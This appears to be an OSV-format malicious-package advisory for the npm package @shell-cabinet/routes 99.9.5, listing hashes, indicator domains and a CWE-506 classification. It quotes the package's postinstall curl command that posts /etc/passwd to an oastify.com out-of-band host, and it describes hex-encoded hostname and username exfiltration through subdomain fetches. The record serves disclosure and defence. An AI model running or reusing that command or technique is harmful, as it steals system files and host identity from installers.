{"id":"MAL-2026-5428","summary":"Malicious code in @shell-cabinet/routes (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (b385f020626d8bad774fe5ebd776683b547bea4edef85944af658fd0155924ad)\nOn `npm install`, the package's postinstall hook runs `curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com`, posting the installer's /etc/passwd to a hostname-prefixed subdomain of oastify.com (a Burp Collaborator out-of-band channel). The same postinstall first executes `scripts/scream3gg.js`, which hex-encodes `os.hostname()`, `os.homedir()`, and `os.userInfo().username` and issues plain-HTTP fetch() requests with the hex chunked into subdomains of `nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com`, leaking host identifiers over DNS-encoded HTTP. Both behaviors fire unconditionally at install time and have no relationship to any documented package functionality.\n","modified":"2026-06-09T18:01:32.755041188Z","published":"2026-06-09T17:18:53Z","database_specific":{"malicious-packages-origins":[{"source":"amazon-inspector","import_time":"2026-06-09T17:45:49.612418024Z","id":"IN-MAL-2026-005023","sha256":"b385f020626d8bad774fe5ebd776683b547bea4edef85944af658fd0155924ad","modified_time":"2026-06-09T17:18:53Z","versions":["99.9.5"]},{"id":"IN-MAL-2026-005024","import_time":"2026-06-09T17:45:49.659171381Z","source":"amazon-inspector","sha256":"d8dcb342941bc75e4b1f4ff0b757d193f681b483a32295dc331468cd2dc1e616","modified_time":"2026-06-09T17:18:53Z","versions":["99.9.5"]}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@shell-cabinet/routes/v/99.9.5"}],"affected":[{"package":{"name":"@shell-cabinet/routes","ecosystem":"npm","purl":"pkg:npm/%40shell-cabinet%2Froutes"},"versions":["99.9.5"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@shell-cabinet/routes/MAL-2026-5428.json","indicators":{"evidence_files":[{"path":"package.json","sha256":"eda57c69d61e98fd57162568b1c0fc5efab6667660c7bfdc911dc86ee46320f6","tlsh":"86d0a7b07800c673bedd06a34128a1817955c85f2214b96256df86e4a114761a4e6516"},{"path":"scripts/scream3gg.js","sha256":"9b962b07165e35cb12a1424434b1d1be779ead9b43df94af8baf0e5a1b66a6c9","tlsh":"74f08ba955b11938382b50819dafd40db1e7fa0630a6e4f2fedd86810f44865bd22dde"}],"domains":["7363616e2d636130376335616366366233.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com","2f686f6d652f7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com","7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com"],"package_integrity":[{"hashes":{"sha1":"6bfb1133e5f75d2e5507150c837267fd322a4a26","sha512_sri":"sha512-qdRAUXJb4ZV0GlLaKvsCgB55xamZ5c+i4+RFoJ9OyR72irI38mXq1ICIk3ZL64FQyu75UUINdY6t2x6InaA1mg=="},"filename":"routes-99.9.5.tgz"}]},"cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}